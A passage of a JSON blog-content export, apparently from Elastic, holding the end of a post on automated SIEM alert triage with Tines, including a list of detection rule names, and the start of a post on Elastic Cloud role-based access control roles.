href=\"https://www.elastic.co/guide/en/kibana/current/cases-api.html\"\u003e\u003cspan style='font-size: 12pt;'\u003eCases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in Elastic Security — with a couple extra actions in this branch you could open a new case, assign it to the on-call analyst, and add the alert details to the case.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Challenges we’ve encountered","_metadata":{"uid":"cs07fa4529d54d2842"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNothing in security is perfect, and for every security control there are ways for threat actors to bypass them. But just because something isn’t perfect doesn’t mean that it isn’t worth the effort. One of the obvious weaknesses is that these alerts have limited effectiveness for insider threats, and if a threat actor is pivoting through a compromised workstation, server, or corporate VPN connection, they can then come from a known good IP address and for rules with automated triaged workflows, alerts would be closed automatically.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eI have two arguments for that: the first is that without this automation in place, most of these detections are impossible to deploy without hundreds of additional employees. Even with their weaknesses, these automated detections provide better visibility than without. The triaged alerts can be used for threat hunting and included in detections that alert on \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/detection-engineering-maximizing-analyst-efficiency-using-cardinality-threshold-rules-on-your-alerts-\"\u003e\u003cspan style='font-size: 12pt;'\u003emultiple distinct detection rules for a host or user\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e so they can still provide value.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSecond, if we can force threat actors to change their tactics — like forcing them to compromise and pivot through one of our workstations or servers — that dramatically increases the chances of detection. Our workstations and servers are highly instrumented with \u003c/span\u003e\u003ca href=\"https://docs.elastic.co/en/integrations/endpoint\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Defend\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and contain over a thousand detection rules in place. We’ve seen that most of the time when a threat actor compromises SaaS credentials or an API secret token, they are usually going to connect to the service directly from their own infrastructure and not through a compromised host.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe other big challenge while building these detections is \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/avoid-shadow-ai-generative-ai-soc\"\u003e\u003cspan style='font-size: 12pt;'\u003eShadow IT\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and all of the interconnections and trusts with third parties in a modern IT system. Shadow IT is a term used to describe when a team in the company sets up their own IT systems without going through all of the proper channels to add the systems to the asset inventory and install Elastic Agent or auditbeat.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhen you build these triage workflows and you are defining what is a “known good IP,” you will also inevitably find that there are API tokens being used in an authorized way from IP addresses that don’t belong to your company. These tokens are usually used for various third-party automations such as GitHub Actions or by scanning applications such as Qualys or Snyk. Tracking these down and building the exceptions can take time, but it can also be very valuable as you identify and remove Shadow IT.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn some cases, the third-party providers such as \u003c/span\u003e\u003ca href=\"https://s3.amazonaws.com/okta-ip-ranges/ip_ranges.json\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eOkta\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, \u003c/span\u003e\u003ca href=\"https://api.github.com/meta\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGitHub\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, or \u003c/span\u003e\u003ca href=\"https://ips.cld.elstc.co/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e will have their public IP spaces published so you can build additional checks to filter out activity from those IPs. If you are using a Tines cloud tenant, you can retrieve the current public IP of your tenant from \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003ehttps://\u0026lt;tenant-domain\u0026gt;/info\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Example detections","_metadata":{"uid":"csa92bff1264aa57ff"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThese automations originally started as a solution for a single detection rule, but we’ve found that they are extremely valuable for many different scenarios. For many of your detection rules, you can ask yourself, “If this alert is triggered by an IP address that we confirmed belongs to us, would our SOC close the alert?” We’ve found this to be true for most of the behavior-based detection rules for third-party services, making them good candidates for automated triage.\u0026nbsp;\u0026nbsp;\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere is a list of some of the detections we automate the initial triage for to give you some ideas for detections you can build with this workflow. Some of these detections are custom detections that are built to work with this automated triage workflow, but many of them are existing detections that we added the Triage tags to in order to eliminate some false positives.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta high risk authentication\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta Support activity from a non-Okta IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta API activity from a new IP\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta UEBA: multiple different alerts for the same email and ip\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta: multiple email addresses seen with a single dt hash\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta successful user login without phishing-resistant MFA\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta Authentication by MFA Exempt account from new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/high-number-of-okta-user-password-reset-or-unlock-attempts.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHigh Number of Okta User Password Reset or Unlock Attempts\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/multiple-okta-user-auth-events-with-same-device-token-hash-behind-a-proxy.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMultiple Okta User Auth Events with Same Device Token Hash Behind a Proxy\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/okta-user-session-impersonation.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta User Session Impersonation\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/okta-user-sessions-started-from-different-geolocations.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOkta User Sessions Started from Different Geolocations\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/attempts-to-brute-force-an-okta-user-account.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAttempts to Brute Force an Okta User Account\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSlack UEBA: multiple different alerts for a Slack user\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGCP Portal login from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGCP IAM activity from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBuildkite web activity from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBuildkite API activity from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGitHub: Multiple UEBA alert for a GitHub PAT\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/github-ueba-multiple-alerts-from-a-github-account.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGitHub UEBA - Multiple Alerts from a GitHub Account\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGitHub: Spike in user cloning private repos\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHashicorp Vault: Multiple UEBA alerts for a Vault user\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAzure Active Directory high risk authentication\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAzure Portal login from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAzure Active Directory powershell sign-in from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAzure Active Directory Device Code authentication\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAzure Active Directory successful login without MFA\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS IAM activity from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS Key UEBA: multiple different alerts for an aws key\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS User UEBA: Multiple different alerts for an AWS account\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS console authentication from a new IP\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/aws-s3-bucket-enumeration-or-brute-force.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS S3 Bucket Enumeration or Brute Force\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/attempts-to-brute-force-a-microsoft-365-user-account.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAttempts to Brute Force a Microsoft 365 User Account\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/o365-excessive-single-sign-on-logon-errors.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eO365 Excessive Single Sign-On Logon Errors\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/potential-successful-ssh-brute-force-attack.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePotential Successful SSH Brute Force Attack\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/spike-in-successful-logon-events-from-a-source-ip.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eSpike in Successful Logon Events from a Source IP\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/vnc-virtual-network-computing-from-the-internet.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVNC (Virtual Network Computing) from the Internet\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/guide/en/security/current/vnc-virtual-network-computing-to-the-internet.html\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVNC (Virtual Network Computing) to the Internet\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Achieving new levels of protection","_metadata":{"uid":"cs68be622fcbadc55a"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this blog post, I showed you how the Elastic InfoSec team uses Tines to automate the initial triage of many of our alerts. This automation enables us to have much better visibility while boosting efficiency, and it lets us spend our time investigating the real threats. Using Tines, we were able to fully investigate and close over 50K alerts in the last 30 days. Each of these alerts were thoroughly investigated and closed out within seconds of being triggered. It would be impossible to have the same level of protections in our network without this.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you want to try this for yourself, you can do it for free with a 14-day trial of \u003c/span\u003e\u003ca href=\"https://cloud.elastic.co/registration\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Cloud\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the always free community edition of \u003c/span\u003e\u003ca href=\"http://www.tines.com\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eTines\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to see how powerful these workflows can be for you.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csfddd4fc537b274c6"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1a50a3b7f655ba34"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2fa7140f552fff76"}}}],"publish_date":"2024-05-31","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","title":"Automated threat protection","label_l10n":"Automated threat protection","keyword":"automated-threat-protection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt49e356fcb7971aca","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:22.822Z","updated_at":"2023-11-06T20:08:22.822Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:37.794Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Anomaly detection","label_l10n":"Anomaly detection","keyword":"anomaly-detection","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7478459fe32592c5","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:08:06.777Z","updated_at":"2023-11-06T20:08:06.777Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.738Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Cybersecurity","label_l10n":"Cybersecurity","keyword":"cybersecurity","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt276db992db94ced9","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:37:07.408Z","updated_at":"2023-11-06T20:37:07.408Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-04T10:22:02.082Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt5035b0f93483b762","ACL":{},"created_at":"2023-11-06T20:43:32.204Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"network-visibility","label_l10n":"Network visibility","tags":[],"title":"Network visibility","updated_at":"2023-11-06T20:43:32.204Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:38:55.573Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blte799688802bb242c","ACL":{},"created_at":"2023-11-06T21:32:44.031Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"soar","label_l10n":"SOAR","tags":[],"title":"SOAR","updated_at":"2023-11-06T21:32:44.031Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:19:34.584Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Threat hunting","label_l10n":"Threat hunting","keyword":"threat-hunting","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltba572dcfa2880a69","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T21:33:57.466Z","updated_at":"2023-11-06T21:33:57.466Z","ACL":{},"_version":1,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:31.696Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"blte007e1c9cef6ad6b","ACL":{},"created_at":"2020-06-17T03:32:48.898Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"endpoint-security","label_l10n":"Endpoint security","tags":[],"title":"Endpoint security","updated_at":"2020-07-06T22:20:15.552Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:22.357Z","user":"blt36e890d06c5ec32c"}},{"_version":2,"locale":"en-us","uid":"blt569b48df66a9ba5d","ACL":{},"created_at":"2020-06-17T03:30:49.259Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security","label_l10n":"Security","tags":[],"title":"Security","updated_at":"2020-07-06T22:20:03.211Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:24:19.430Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt48dfd27a9f2d8fb0","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-05-29T16:19:28.863Z","created_by":"bltb6c155cd84fc0c1a","file_size":"181625","filename":"stratus_clouds.jpg","parent_uid":null,"tags":[],"title":"stratus clouds.jpg","updated_at":"2024-05-29T16:19:28.863Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-05-31T13:00:02.173Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt48dfd27a9f2d8fb0/665755902da50d456147434c/stratus_clouds.jpg"},"title":"Reducing false positives with automated SIEM investigations from Elastic and Tines","title_l10n":"Reducing false positives with automated SIEM investigations from Elastic and Tines","updated_at":"2024-12-09T08:41:40.565Z","updated_by":"blt3e52848e0cb3c394","url":"/blog/false-positives-automated-siem-investigations-elastic-tines","publish_details":{"time":"2024-12-09T08:41:46.370Z","user":"blt3e52848e0cb3c394","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt55387f05b4587c4e","_version":7,"locale":"en-us","ACL":{},"abstract_l10n":"Role-based access control is an enterprise security best practice that gives a structured way to manage access to cloud resources. Learn how to use Elastic Cloud RBAC to grant different privileges on the Cloud console and Elastic Stack deployments.","author":["bltd40b1c822e24d3a9"],"category":["bltb79594af7c5b4199"],"created_at":"2023-09-13T14:31:56.133Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csbdcb29b22d9281f2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDid you know that you can assign roles to users to implement fine-grained control for your Elastic\u003c/span\u003e\u003cspan style=\"font-size: 0.6em;\"\u003e\u003csup\u003e®\u003c/sup\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Cloud organization and deployments?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eRole-based access control (RBAC) is a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/security/cloud-security\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ecloud security\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e best practice that is considered a standard feature in enterprise software, as it provides a structured way to manage access to cloud resources. Within an RBAC framework, \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cem\u003eroles\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e are a vital construct for grouping, organizing, and delegating permissions to different users. These roles provide a consistent way to manage and clarify user access and minimize the risk of errors or oversights.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eBy assigning roles to users, organizations can ensure that each user has access only to the resources they need to perform their job, while also limiting the risk of unauthorized access to sensitive information or functionalities. Role assignment also applies to API keys, which can be considered “machine users” that enable automation via API calls.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Elastic Cloud roles and use cases","_metadata":{"uid":"csb0becd8694c48627"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWithin an Elastic Cloud organization, users and API keys can have one or more roles and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-user-privileges.html#ec-user-privileges\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eeach role grants specific privileges\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. Depending on the role type, a role can be assigned at an organization-wide level or at a deployment level. Deployment-level roles control access either to all deployments or a specific deployment.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWhen logging into a deployment, a user’s Elastic Cloud role dictates what permissions the user has based on an \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/cloud/current/ec-user-privileges.html#ec-stack-user-org-member\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Stack role mapping\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. This mapping allows for centralized control over resource access for the Elastic Cloud platform and deployment applications through a single role. The following image shows some real-life examples of Elastic Cloud roles as they map to deployments inside an Organization.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8c85b80cdbd25a7d"}}},{"image":{"image":{"_version":1,"is_dir":false,"uid":"blta8efec62cb8194bf","ACL":{},"content_type":"image/png","created_at":"2023-09-13T14:29:11.330Z","created_by":"bltb6c155cd84fc0c1a","file_size":"72262","filename":"rbac-acme-org.png","parent_uid":null,"tags":[],"title":"rbac-acme-org.png","updated_at":"2023-09-13T14:29:11.330Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-09-18T14:00:00.433Z","user":"bltb6c155cd84fc0c1a"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta8efec62cb8194bf/6501c73755996b851c06e5cc/rbac-acme-org.png"},"_metadata":{"uid":"cs816b56957cb3c67a"},"caption_l10n":"","alt_text_l10n":"rbac-acme-org","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs4b30eb691897fd84"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe standard Elastic Cloud roles are as follows:\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cstrong\u003eOrganization owner: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003eThis role is assigned by default to the person who created the organization; typically, it should be assigned to system administrators of your Elastic Cloud environment. This role provides complete control of deployments, organization-level details and properties, security privileges such as role management, as well as billing and subscription management. Organization owners log in to deployments with the \u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cem\u003esuperuser\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e stack role privileges.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cstrong\u003eBilling admin: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003eThis role allows managing an organization’s billing details such as credit card information, subscription, and invoice history. Billing admins cannot manage other organization or deployment-level details and properties or sign in to deployments. Budget holders or financial teams are the typical users associated with the Billing admin role.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cstrong\u003eAdmin: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003eThis role is reserved for Elastic Cloud deployment administrators. It grants access to all deployment details, properties, and security privileges. Like Organization owners, Admins log in to deployments with \u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cem\u003esuperuser\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e stack role privileges. This role can apply to one or more deployments.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cstrong\u003eEditor: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003eThis role has the same rights as Admin \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eexcept for deployment creation and management of security privileges\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e and is able to sign in to the deployment with the \u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cem\u003eeditor\u003c/em\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/elasticsearch/reference/8.9/built-in-roles.html#built-in-roles\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003estack role\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e. Editor applies to one or more deployments and is usually suited for IT professionals working with the Elastic Stack.\u003c/span\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003e\u003cstrong\u003eViewer: \u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"color: rgb(33, 37, 41);font-size: 12pt;\"\u003eThis role only allows users to view deployment details and interact with them but provides no edit access, so it can be assigned to members of your team requiring 